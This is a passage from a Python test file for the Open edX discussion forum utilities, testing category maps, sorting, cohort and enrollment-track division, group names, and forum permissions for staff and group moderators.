"children": [("Section 1", TYPE_SUBCATEGORY)]
}
},
"children": [("Chapter 1", TYPE_SUBCATEGORY), ("Chapter 2", TYPE_SUBCATEGORY),
("Chapter 3", TYPE_SUBCATEGORY)]
}
)
# empty / default config
check_divided(False)
# explicitly disabled cohorting
set_discussion_division_settings(self.course.id, enable_cohorts=False)
check_divided(False)
# explicitly enable courses divided by Cohort with inline discusssions also divided.
set_discussion_division_settings(self.course.id, enable_cohorts=True, always_divide_inline_discussions=True)
check_divided(True)
def test_tree_with_duplicate_targets(self):
self.create_discussion("Chapter 1", "Discussion A")
self.create_discussion("Chapter 1", "Discussion B")
self.create_discussion("Chapter 1", "Discussion A") # duplicate
self.create_discussion("Chapter 1", "Discussion A") # another duplicate
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion") # duplicate
category_map = utils.get_discussion_category_map(self.course, self.user)
chapter1 = category_map["subcategories"]["Chapter 1"]
chapter1_discussions = set(["Discussion A", "Discussion B", "Discussion A (1)", "Discussion A (2)"])
chapter1_discussions_with_types = set([("Discussion A", TYPE_ENTRY), ("Discussion B", TYPE_ENTRY),
("Discussion A (1)", TYPE_ENTRY), ("Discussion A (2)", TYPE_ENTRY)])
assert set(chapter1['children']) == chapter1_discussions_with_types
assert set(chapter1['entries'].keys()) == chapter1_discussions
chapter2 = category_map["subcategories"]["Chapter 2"]
subsection1 = chapter2["subcategories"]["Section 1"]["subcategories"]["Subsection 1"]
subsection1_discussions = set(["Discussion", "Discussion (1)"])
subsection1_discussions_with_types = set([("Discussion", TYPE_ENTRY), ("Discussion (1)", TYPE_ENTRY)])
assert set(subsection1['children']) == subsection1_discussions_with_types
assert set(subsection1['entries'].keys()) == subsection1_discussions
def test_start_date_filter(self):
now = datetime.datetime.now()
self.create_discussion("Chapter 1", "Discussion 1", start=now)
self.create_discussion("Chapter 1", "Discussion 2 обсуждение", start=self.later)
self.create_discussion("Chapter 2", "Discussion", start=now)
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion", start=self.later)
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion", start=self.later)
self.create_discussion("Chapter 3 / Section 1", "Discussion", start=self.later)
assert not self.course.self_paced
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter 1": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion 1", TYPE_ENTRY)]
},
"Chapter 2": {
"entries": {
"Discussion": {
"id": "discussion3",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Chapter 1", TYPE_SUBCATEGORY), ("Chapter 2", TYPE_SUBCATEGORY)]
}
)
def test_self_paced_start_date_filter(self):
self.course.self_paced = True
now = datetime.datetime.now()
self.create_discussion("Chapter 1", "Discussion 1", start=now)
self.create_discussion("Chapter 1", "Discussion 2", start=self.later)
self.create_discussion("Chapter 2", "Discussion", start=now)
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion", start=self.later)
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion", start=self.later)
self.create_discussion("Chapter 3 / Section 1", "Discussion", start=self.later)
assert self.course.self_paced
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter 1": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": None,
"is_divided": False,
},
"Discussion 2": {
"id": "discussion2",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion 1", TYPE_ENTRY), ("Discussion 2", TYPE_ENTRY)]
},
"Chapter 2": {
"entries": {
"Discussion": {
"id": "discussion3",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {
"Section 1": {
"entries": {},
"subcategories": {
"Subsection 1": {
"entries": {
"Discussion": {
"id": "discussion4",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
},
"Subsection 2": {
"entries": {
"Discussion": {
"id": "discussion5",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Subsection 1", TYPE_SUBCATEGORY), ("Subsection 2", TYPE_SUBCATEGORY)]
}
},
"children": [("Discussion", TYPE_ENTRY), ("Section 1", TYPE_SUBCATEGORY)]
},
"Chapter 3": {
"entries": {},
"subcategories": {
"Section 1": {
"entries": {
"Discussion": {
"id": "discussion6",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Section 1", TYPE_SUBCATEGORY)]
}
},
"children": [("Chapter 1", TYPE_SUBCATEGORY), ("Chapter 2", TYPE_SUBCATEGORY),
("Chapter 3", TYPE_SUBCATEGORY)]
}
)
def test_sort_inline_explicit(self):
self.create_discussion("Chapter", "Discussion 1", sort_key="D")
self.create_discussion("Chapter", "Discussion 2", sort_key="A")
self.create_discussion("Chapter", "Discussion 3", sort_key="E")
self.create_discussion("Chapter", "Discussion 4", sort_key="C")
self.create_discussion("Chapter", "Discussion 5", sort_key="B")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": "D",
"is_divided": False,
},
"Discussion 2": {
"id": "discussion2",
"sort_key": "A",
"is_divided": False,
},
"Discussion 3": {
"id": "discussion3",
"sort_key": "E",
"is_divided": False,
},
"Discussion 4": {
"id": "discussion4",
"sort_key": "C",
"is_divided": False,
},
"Discussion 5": {
"id": "discussion5",
"sort_key": "B",
"is_divided": False,
}
},
"subcategories": {},
"children": [
("Discussion 2", TYPE_ENTRY),
("Discussion 5", TYPE_ENTRY),
("Discussion 4", TYPE_ENTRY),
("Discussion 1", TYPE_ENTRY),
("Discussion 3", TYPE_ENTRY)
]
}
},
"children": [("Chapter", TYPE_SUBCATEGORY)]
}
)
def test_sort_configured_topics_explicit(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A", "sort_key": "B"},
"Topic B": {"id": "Topic_B", "sort_key": "C"},
"Topic C": {"id": "Topic_C", "sort_key": "A"}
}
self.assert_category_map_equals(
{
"entries": {
"Topic A": {"id": "Topic_A", "sort_key": "B", "is_divided": False},
"Topic B": {"id": "Topic_B", "sort_key": "C", "is_divided": False},
"Topic C": {"id": "Topic_C", "sort_key": "A", "is_divided": False},
},
"subcategories": {},
"children": [("Topic C", TYPE_ENTRY), ("Topic A", TYPE_ENTRY), ("Topic B", TYPE_ENTRY)]
}
)
def test_sort_alpha(self):
self.course.discussion_sort_alpha = True
self.create_discussion("Chapter", "Discussion D")
self.create_discussion("Chapter", "Discussion A")
self.create_discussion("Chapter", "Discussion E")
self.create_discussion("Chapter", "Discussion C")
self.create_discussion("Chapter", "Discussion B")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion D": {
"id": "discussion1",
"sort_key": "Discussion D",
"is_divided": False,
},
"Discussion A": {
"id": "discussion2",
"sort_key": "Discussion A",
"is_divided": False,
},
"Discussion E": {
"id": "discussion3",
"sort_key": "Discussion E",
"is_divided": False,
},
"Discussion C": {
"id": "discussion4",
"sort_key": "Discussion C",
"is_divided": False,
},
"Discussion B": {
"id": "discussion5",
"sort_key": "Discussion B",
"is_divided": False,
}
},
"subcategories": {},
"children": [
("Discussion A", TYPE_ENTRY),
("Discussion B", TYPE_ENTRY),
("Discussion C", TYPE_ENTRY),
("Discussion D", TYPE_ENTRY),
("Discussion E", TYPE_ENTRY)
]
}
},
"children": [("Chapter", TYPE_SUBCATEGORY)]
}
)
def test_sort_intermediates(self):
self.create_discussion("Chapter B", "Discussion 2")
self.create_discussion("Chapter C", "Discussion")
self.create_discussion("Chapter A", "Discussion 1")
self.create_discussion("Chapter B", "Discussion 1")
self.create_discussion("Chapter A", "Discussion 2")
self.assert_category_map_equals(
{
"children": [("Chapter A", TYPE_SUBCATEGORY), ("Chapter B", TYPE_SUBCATEGORY),
("Chapter C", TYPE_SUBCATEGORY)],
"entries": {},
"subcategories": {
"Chapter A": {
"children": [("Discussion 1", TYPE_ENTRY), ("Discussion 2", TYPE_ENTRY)],
"entries": {
"Discussion 1": {
"id": "discussion3",
"sort_key": None,
"is_divided": False,
},
"Discussion 2": {
"id": "discussion5",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
},
"Chapter B": {
"children": [("Discussion 2", TYPE_ENTRY), ("Discussion 1", TYPE_ENTRY)],
"entries": {
"Discussion 2": {
"id": "discussion1",
"sort_key": None,
"is_divided": False,
},
"Discussion 1": {
"id": "discussion4",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
},
"Chapter C": {
"entries": {
"Discussion": {
"id": "discussion2",
"sort_key": None,
"is_divided": False,
}
},
"children": [("Discussion", TYPE_ENTRY)],
"subcategories": {},
}
},
}
)
def test_ids_empty(self):
assert utils.get_discussion_categories_ids(self.course, self.user) == []
def test_ids_configured_topics(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A"},
"Topic B": {"id": "Topic_B"},
"Topic C": {"id": "Topic_C"}
}
assert len(utils.get_discussion_categories_ids(self.course, self.user)) ==\
len(["Topic_A", "Topic_B", "Topic_C"])
def test_ids_inline(self):
self.create_discussion("Chapter 1", "Discussion 1")
self.create_discussion("Chapter 1", "Discussion 2")
self.create_discussion("Chapter 2", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion")
self.create_discussion("Chapter 3 / Section 1", "Discussion")
assert len(utils.get_discussion_categories_ids(self.course, self.user)) ==\
len(["discussion1", "discussion2", "discussion3", "discussion4", "discussion5", "discussion6"])
def test_ids_mixed(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A"},
"Topic B": {"id": "Topic_B"},
"Topic C": {"id": "Topic_C"}
}
self.create_discussion("Chapter 1", "Discussion 1")
self.create_discussion("Chapter 2", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
assert len(utils.get_discussion_categories_ids(self.course, self.user)) ==\
len(["Topic_A", "Topic_B", "Topic_C", "discussion1", "discussion2", "discussion3"])
class ContentGroupCategoryMapTestCase(CategoryMapTestMixin, ContentGroupTestCase):
"""
Tests `get_discussion_category_map` on discussion xblocks which are
only visible to some content groups.
"""
def test_staff_user(self):
"""
Verify that the staff user can access the alpha, beta, and
global discussion topics.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
('Visible to Alpha', 'entry'),
('Visible to Beta', 'entry'),
('Visible to Everyone', 'entry')
],
'entries': {
'Visible to Alpha': {
'sort_key': None,
'is_divided': False,
'id': 'alpha_group_discussion'
},
'Visible to Beta': {
'sort_key': None,
'is_divided': False,
'id': 'beta_group_discussion'
},
'Visible to Everyone': {
'sort_key': None,
'is_divided': False,
'id': 'global_group_discussion'
}
}
}
},
'children': [('General', 'entry'), ('Week 1', 'subcategory')],
'entries': {
'General': {
'sort_key': 'General',
'is_divided': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.staff_user
)
def test_alpha_user(self):
"""
Verify that the alpha user can access the alpha and global
discussion topics.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
('Visible to Alpha', 'entry'),
('Visible to Everyone', 'entry')
],
'entries': {
'Visible to Alpha': {
'sort_key': None,
'is_divided': False,
'id': 'alpha_group_discussion'
},
'Visible to Everyone': {
'sort_key': None,
'is_divided': False,
'id': 'global_group_discussion'
}
}
}
},
'children': [('General', 'entry'), ('Week 1', 'subcategory')],
'entries': {
'General': {
'sort_key': 'General',
'is_divided': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.alpha_user
)
def test_beta_user(self):
"""
Verify that the beta user can access the beta and global
discussion topics.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [('Visible to Beta', 'entry'), ('Visible to Everyone', 'entry')],
'entries': {
'Visible to Beta': {
'sort_key': None,
'is_divided': False,
'id': 'beta_group_discussion'
},
'Visible to Everyone': {
'sort_key': None,
'is_divided': False,
'id': 'global_group_discussion'
}
}
}
},
'children': [('General', 'entry'), ('Week 1', 'subcategory')],
'entries': {
'General': {
'sort_key': 'General',
'is_divided': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.beta_user
)
def test_non_cohorted_user(self):
"""
Verify that the non-cohorted user can access the global
discussion topic.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
('Visible to Everyone', 'entry')
],
'entries': {
'Visible to Everyone': {
'sort_key': None,
'is_divided': False,
'id': 'global_group_discussion'
}
}
}
},
'children': [('General', 'entry'), ('Week 1', 'subcategory')],
'entries': {
'General': {
'sort_key': 'General',
'is_divided': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.non_cohorted_user
)
class JsonResponseTestCase(TestCase, UnicodeTestMixin):
def _test_unicode_data(self, text):
response = utils.JsonResponse(text)
reparsed = json.loads(response.content.decode('utf-8'))
assert reparsed == text
class DiscussionTabTestCase(ModuleStoreTestCase):
""" Test visibility of the discussion tab. """
def setUp(self):
super().setUp()
self.course = CourseFactory.create()
self.enrolled_user = UserFactory.create()
self.staff_user = AdminFactory.create()
CourseEnrollmentFactory.create(user=self.enrolled_user, course_id=self.course.id)
self.unenrolled_user = UserFactory.create()
def discussion_tab_present(self, user):
""" Returns true if the user has access to the discussion tab. """
request = RequestFactory().request()
all_tabs = get_course_tab_list(user, self.course)
return any(tab.type == 'discussion' for tab in all_tabs)
def test_tab_access(self):
with self.settings(FEATURES={'ENABLE_DISCUSSION_SERVICE': True}):
assert self.discussion_tab_present(self.staff_user)
assert self.discussion_tab_present(self.enrolled_user)
assert not self.discussion_tab_present(self.unenrolled_user)
@mock.patch('lms.djangoapps.ccx.overrides.get_current_ccx')
def test_tab_settings(self, mock_get_ccx):
mock_get_ccx.return_value = True
with self.settings(FEATURES={'ENABLE_DISCUSSION_SERVICE': False}):
assert not self.discussion_tab_present(self.enrolled_user)
with self.settings(FEATURES={'CUSTOM_COURSES_EDX': True}):
assert not self.discussion_tab_present(self.enrolled_user)
class IsCommentableDividedTestCase(ModuleStoreTestCase):
"""
Test the is_commentable_divided function.
"""
MODULESTORE = TEST_DATA_MIXED_MODULESTORE
def setUp(self):
"""
Make sure that course is reloaded every time--clear out the modulestore.
"""
super().setUp()
self.toy_course_key = ToyCourseFactory.create().id
def test_is_commentable_divided(self):
course = modulestore().get_course(self.toy_course_key)
assert not cohorts.is_course_cohorted(course.id)
def to_id(name):
"""Helper for topic_name_to_id that uses course."""
return topic_name_to_id(course, name)
# no topics
assert not utils.is_commentable_divided(course.id, to_id('General')), "Course doesn't even have a 'General' topic"
# not cohorted
config_course_cohorts(course, is_cohorted=False)
config_course_discussions(course, discussion_topics=["General", "Feedback"])
assert not utils.is_commentable_divided(course.id, to_id('General')), "Course isn't cohorted"
# cohorted, but top level topics aren't
config_course_cohorts(course, is_cohorted=True)
config_course_discussions(course, discussion_topics=["General", "Feedback"])
assert cohorts.is_course_cohorted(course.id)
assert not utils.is_commentable_divided(course.id, to_id('General')), "Course is cohorted, but 'General' isn't."
# cohorted, including "Feedback" top-level topics aren't
config_course_cohorts(
course,
is_cohorted=True
)
config_course_discussions(course, discussion_topics=["General", "Feedback"], divided_discussions=["Feedback"])
assert cohorts.is_course_cohorted(course.id)
assert not utils.is_commentable_divided(course.id, to_id('General')), "Course is cohorted, but 'General' isn't."
assert utils.is_commentable_divided(course.id, to_id('Feedback')), 'Feedback was listed as cohorted. Should be.'
def test_is_commentable_divided_inline_discussion(self):
course = modulestore().get_course(self.toy_course_key)
assert not cohorts.is_course_cohorted(course.id)
def to_id(name):
return topic_name_to_id(course, name)
config_course_cohorts(
course,
is_cohorted=True,
)
config_course_discussions(
course,
discussion_topics=["General", "Feedback"],
divided_discussions=["Feedback", "random_inline"]
)
assert not utils.is_commentable_divided(course.id, to_id('random')), 'By default, Non-top-level discussions are not cohorted in a cohorted courses.'
# if always_divide_inline_discussions is set to False, non-top-level discussion are always
# not divided unless they are explicitly set in divided_discussions
config_course_cohorts(
course,
is_cohorted=True,
)
config_course_discussions(
course,
discussion_topics=["General", "Feedback"],
divided_discussions=["Feedback", "random_inline"],
always_divide_inline_discussions=False
)
assert not utils.is_commentable_divided(course.id, to_id('random')), 'Non-top-level discussion is not cohorted if always_divide_inline_discussions is False.'
assert utils.is_commentable_divided(course.id, to_id('random_inline')), 'If always_divide_inline_discussions set to False, Non-top-level discussion is cohorted if explicitly set in cohorted_discussions.'
assert utils.is_commentable_divided(course.id, to_id('Feedback')), 'If always_divide_inline_discussions set to False, top-level discussion are not affected.'
def test_is_commentable_divided_team(self):
course = modulestore().get_course(self.toy_course_key)
assert not cohorts.is_course_cohorted(course.id)
config_course_cohorts(course, is_cohorted=True)
config_course_discussions(course, always_divide_inline_discussions=True)
team = CourseTeamFactory(course_id=course.id)
# Verify that team discussions are not cohorted, but other discussions are
# if "always cohort inline discussions" is set to true.
assert not utils.is_commentable_divided(course.id, team.discussion_topic_id)
assert utils.is_commentable_divided(course.id, 'random')
def test_is_commentable_divided_cohorts(self):
course = modulestore().get_course(self.toy_course_key)
set_discussion_division_settings(
course.id,
enable_cohorts=True,
divided_discussions=[],
always_divide_inline_discussions=True,
division_scheme=CourseDiscussionSettings.NONE,
)
# Although Cohorts are enabled, discussion division is explicitly disabled.
assert not utils.is_commentable_divided(course.id, 'random')
# Now set the discussion division scheme.
set_discussion_division_settings(
course.id,
enable_cohorts=True,
divided_discussions=[],
always_divide_inline_discussions=True,
division_scheme=CourseDiscussionSettings.COHORT,
)
assert utils.is_commentable_divided(course.id, 'random')
def test_is_commentable_divided_enrollment_track(self):
course = modulestore().get_course(self.toy_course_key)
set_discussion_division_settings(
course.id,
divided_discussions=[],
always_divide_inline_discussions=True,
division_scheme=CourseDiscussionSettings.ENROLLMENT_TRACK,
)
# Although division scheme is set to ENROLLMENT_TRACK, divided returns
# False because there is only a single enrollment mode.
assert not utils.is_commentable_divided(course.id, 'random')
# Now create 2 explicit course modes.
CourseModeFactory.create(course_id=course.id, mode_slug=CourseMode.AUDIT)
CourseModeFactory.create(course_id=course.id, mode_slug=CourseMode.VERIFIED)
assert utils.is_commentable_divided(course.id, 'random')
class GroupIdForUserTestCase(ModuleStoreTestCase):
""" Test the get_group_id_for_user method. """
def setUp(self):
super().setUp()
self.course = CourseFactory.create()
CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.AUDIT)
CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.VERIFIED)
self.test_user = UserFactory.create()
CourseEnrollmentFactory.create(
mode=CourseMode.VERIFIED, user=self.test_user, course_id=self.course.id
)
self.test_cohort = CohortFactory(
course_id=self.course.id,
name='Test Cohort',
users=[self.test_user]
)
def test_discussion_division_disabled(self):
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert CourseDiscussionSettings.NONE == course_discussion_settings.division_scheme
assert utils.get_group_id_for_user(self.test_user, course_discussion_settings) is None
def test_discussion_division_by_cohort(self):
set_discussion_division_settings(
self.course.id, enable_cohorts=True, division_scheme=CourseDiscussionSettings.COHORT
)
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert CourseDiscussionSettings.COHORT == course_discussion_settings.division_scheme
assert self.test_cohort.id == utils.get_group_id_for_user(self.test_user, course_discussion_settings)
def test_discussion_division_by_enrollment_track(self):
set_discussion_division_settings(
self.course.id, division_scheme=CourseDiscussionSettings.ENROLLMENT_TRACK
)
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert CourseDiscussionSettings.ENROLLMENT_TRACK == course_discussion_settings.division_scheme
assert (- 2) == utils.get_group_id_for_user(self.test_user, course_discussion_settings)
class CourseDiscussionDivisionEnabledTestCase(ModuleStoreTestCase):
""" Test the course_discussion_division_enabled and available_division_schemes methods. """
def setUp(self):
super().setUp()
self.course = CourseFactory.create()
CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.AUDIT)
self.test_cohort = CohortFactory(
course_id=self.course.id,
name='Test Cohort',
users=[]
)
def test_discussion_division_disabled(self):
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert not utils.course_discussion_division_enabled(course_discussion_settings)
assert [] == utils.available_division_schemes(self.course.id)
def test_discussion_division_by_cohort(self):
set_discussion_division_settings(
self.course.id, enable_cohorts=False, division_scheme=CourseDiscussionSettings.COHORT
)
# Because cohorts are disabled, discussion division is not enabled.
assert not utils.course_discussion_division_enabled(get_course_discussion_settings(self.course.id))
assert [] == utils.available_division_schemes(self.course.id)
# Now enable cohorts, which will cause discussions to be divided.
set_discussion_division_settings(
self.course.id, enable_cohorts=True, division_scheme=CourseDiscussionSettings.COHORT
)
assert utils.course_discussion_division_enabled(get_course_discussion_settings(self.course.id))
assert [CourseDiscussionSettings.COHORT] == utils.available_division_schemes(self.course.id)
def test_discussion_division_by_enrollment_track(self):
set_discussion_division_settings(
self.course.id, division_scheme=CourseDiscussionSettings.ENROLLMENT_TRACK
)
# Only a single enrollment track exists, so discussion division is not enabled.
assert not utils.course_discussion_division_enabled(get_course_discussion_settings(self.course.id))
assert [] == utils.available_division_schemes(self.course.id)
# Now create a second CourseMode, which will cause discussions to be divided.
CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.VERIFIED)
assert utils.course_discussion_division_enabled(get_course_discussion_settings(self.course.id))
assert [CourseDiscussionSettings.ENROLLMENT_TRACK] == utils.available_division_schemes(self.course.id)
class GroupNameTestCase(ModuleStoreTestCase):
""" Test the get_group_name and get_group_names_by_id methods. """
def setUp(self):
super().setUp()
self.course = CourseFactory.create()
CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.AUDIT)
CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.VERIFIED)
self.test_cohort_1 = CohortFactory(
course_id=self.course.id,
name='Cohort 1',
users=[]
)
self.test_cohort_2 = CohortFactory(
course_id=self.course.id,
name='Cohort 2',
users=[]
)
def test_discussion_division_disabled(self):
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert {} == utils.get_group_names_by_id(course_discussion_settings)
assert utils.get_group_name((- 1000), course_discussion_settings) is None
def test_discussion_division_by_cohort(self):
set_discussion_division_settings(
self.course.id, enable_cohorts=True, division_scheme=CourseDiscussionSettings.COHORT
)
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert {self.test_cohort_1.id: self.test_cohort_1.name, self.test_cohort_2.id: self.test_cohort_2.name} == utils.get_group_names_by_id(course_discussion_settings)
assert self.test_cohort_2.name == utils.get_group_name(self.test_cohort_2.id, course_discussion_settings)
# Test also with a group_id that doesn't exist.
assert utils.get_group_name((- 1000), course_discussion_settings) is None
def test_discussion_division_by_enrollment_track(self):
set_discussion_division_settings(
self.course.id, division_scheme=CourseDiscussionSettings.ENROLLMENT_TRACK
)
course_discussion_settings = get_course_discussion_settings(self.course.id)
assert {(- 1): 'audit course', (- 2): 'verified course'} == utils.get_group_names_by_id(course_discussion_settings)
assert 'verified course' == utils.get_group_name((- 2), course_discussion_settings)
# Test also with a group_id that doesn't exist.
assert utils.get_group_name((- 1000), course_discussion_settings) is None
class PermissionsTestCase(ModuleStoreTestCase):
"""Test utils functionality related to forums "abilities" (permissions)"""
def test_get_ability(self):
content = {}
content['user_id'] = '1'
content['type'] = 'thread'
user = mock.Mock()
user.id = 1
with mock.patch(
'lms.djangoapps.discussion.django_comment_client.utils.check_permissions_by_view'
) as check_perm:
check_perm.return_value = True
assert utils.get_ability(None, content, user) == {'editable': True, 'can_reply': True, 'can_delete': True, 'can_openclose': True, 'can_vote': False, 'can_report': False}
content['user_id'] = '2'
assert utils.get_ability(None, content, user) == {'editable': True, 'can_reply': True, 'can_delete': True, 'can_openclose': True, 'can_vote': True, 'can_report': True}
def test_get_ability_with_global_staff(self):
"""
Tests that global staff has rights to report other user's post inspite
of enrolled in the course or not.
"""
content = {'user_id': '1', 'type': 'thread'}
with mock.patch(
'lms.djangoapps.discussion.django_comment_client.utils.check_permissions_by_view'
) as check_perm:
# check_permissions_by_view returns false because user is not enrolled in the course.
check_perm.return_value = False
global_staff = UserFactory(username='global_staff', email='global_staff@edx.org', is_staff=True)
assert utils.get_ability(None, content, global_staff) == {'editable': False, 'can_reply': False, 'can_delete': False, 'can_openclose': False, 'can_vote': False, 'can_report': True}
def test_is_content_authored_by(self):
content = {}
user = mock.Mock()
user.id = 1
# strict equality checking
content['user_id'] = 1
assert utils.is_content_authored_by(content, user)
# cast from string to int
content['user_id'] = '1'
assert utils.is_content_authored_by(content, user)
# strict equality checking, fails
content['user_id'] = 2
assert not utils.is_content_authored_by(content, user)
# cast from string to int, fails
content['user_id'] = 'string'
assert not utils.is_content_authored_by(content, user)
# content has no known author
del content['user_id']
assert not utils.is_content_authored_by(content, user)
class GroupModeratorPermissionsTestCase(ModuleStoreTestCase):
"""Test utils functionality related to forums "abilities" (permissions) for group moderators"""
def _check_condition(user, condition, content):
"""
Mocks check_condition method because is_open and is_team_member_if_applicable must always be true
in order to interact with a thread or comment.
"""
return True if condition == 'is_open' or condition == 'is_team_member_if_applicable' else False
def setUp(self):
super().setUp()
# Create course, seed permissions roles, and create team
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
verified_coursemode = CourseMode.VERIFIED
audit_coursemode = CourseMode.AUDIT
# Create four users: group_moderator (who is within the verified enrollment track and in the cohort),
# verified_user (who is in the verified enrollment track but not the cohort),
# cohorted_user (who is in the cohort but not the verified enrollment track),
# and plain_user (who is neither in the cohort nor the verified enrollment track)
self.group_moderator = UserFactory(username='group_moderator', email='group_moderator@edx.org')
CourseEnrollmentFactory(
course_id=self.course.id,
user=self.group_moderator,
mode=verified_coursemode
)
self.verified_user = UserFactory(username='verified', email='verified@edx.org')
CourseEnrollmentFactory(
course_id=self.course.id,
user=self.verified_user,
mode=verified_coursemode
)
self.cohorted_user = UserFactory(username='cohort', email='cohort@edx.org')
CourseEnrollmentFactory(
course_id=self.course.id,
user=self.cohorted_user,
mode=audit_coursemode
)
self.plain_user = UserFactory(username='plain', email='plain@edx.org')
CourseEnrollmentFactory(
course_id=self.course.id,
user=self.plain_user,
mode=audit_coursemode
)
CohortFactory(
course_id=self.course.id,
name='Test Cohort',
users=[self.group_moderator, self.cohorted_user]
)
# Give group moderator permissions to group_moderator
assign_role(self.course.id, self.group_moderator, 'Group Moderator')
@mock.patch(
'lms.djangoapps.discussion.django_comment_client.permissions._check_condition',
side_effect=_check_condition,
)
def test_not_divided(self, check_condition_function):
"""
Group moderator should not have moderator permissions if the discussions are not divided.
"""
content = {'user_id': self.plain_user.id, 'type': 'thread', 'username': self.plain_user.username}
assert utils.get_ability(self.course.id, content, self.group_moderator) == {'editable': False, 'can_reply': True, 'can_delete': False, 'can_openclose': False, 'can_vote': True, 'can_report': True}
content = {'user_id': self.cohorted_user.id, 'type': 'thread'}
assert utils.get_ability(self.course.id, content, self.group_moderator) == {'editable': False, 'can_reply': True, 'can_delete': False, 'can_openclose': False, 'can_vote': True, 'can_report': True}
content = {'user_id': self.verified_user.id, 'type': 'thread'}
assert utils.get_ability(self.course.id, content, self.group_moderator) == {'editable': False, 'can_reply': True, 'can_delete': False, 'can_openclose': False, 'can_vote': True, 'can_report': True}
@mock.patch(
'lms.djangoapps.discussion.django_comment_client.permissions._check_condition',
side_effect=_check_condition,
)
def test_divided_within_group(self, check_condition_function):
"""
Group moderator should have moderator permissions within their group if the discussions are divided.
"""
set_discussion_division_settings(self.course.id, enable_cohorts=True,
division_scheme=CourseDiscussionSettings.COHORT)
content = {'user_id': self.cohorted_user.id, 'type': 'thread', 'username': self.cohorted_user.username}
assert utils.get_ability(self.course.id, content, self.group_moderator) == {'editable': True, 'can_reply': True, 'can_delete': True, 'can_openclose': True, 'can_vote': True, 'can_report': True}
@mock.patch(
'lms.djangoapps.discussion.django_comment_client.permissions._check_condition',
side_effect=_check_condition,
)
def test_divided_outside_group(self, check_condition_function):
"""
Group moderator should not have moderator permissions outside of their group.
"""
content = {'user_id': self.plain_user.id, 'type': 'thread', 'username': self.plain_user.username}
set_discussion_division_settings(self.course.id, division_scheme=CourseDiscussionSettings.NONE)
assert utils.get_ability(self.course.id, content, self.group_moderator) == {'editable': False, 'can_reply': True, 'can_delete': False, 'can_openclose': False, 'can_vote': True, 'can_report': True}
class ClientConfigurationTestCase(TestCase):
"""Simple test cases to ensure enabling/disabling the use of the comment service works as intended."""
def test_disabled(self):
"""Ensures that an exception is raised when forums are disabled."""
config = ForumsConfig.current()
config.enabled = False
config.save()
with pytest.raises(CommentClientMaintenanceError):
perform_request('GET', 'http://www.google.com')
@patch('requests.request')
def test_enabled(self, mock_request):
"""Ensures that requests proceed normally when forums are enabled."""
config = ForumsConfig.current()
config.enabled = True
config.save()
response = Mock()
response.status_code = 200
response.json = lambda: {}
mock_request.return_value = response
result = perform_request('GET', 'http://www.google.com')
assert result == {}
def set_discussion_division_settings(
course_key, enable_cohorts=False, always_divide_inline_discussions=False,
divided_discussions=[], division_scheme=CourseDiscussionSettings.COHORT
):
"""
Convenience method for setting cohort enablement and discussion settings.
COHORT is the default division_scheme, as no other schemes were supported at
the time that the unit tests were originally written.
"""
set_course_discussion_settings(
course_key=course_key,
divided_discussions=divided_discussions,
division_scheme=division_scheme,
always_divide_inline_discussions=always_divide_inline_discussions,
)
set_course_cohorted(course_key, enable_cohorts)
@ddt.ddt
class MiscUtilsTests(TestCase):
@ddt.data(
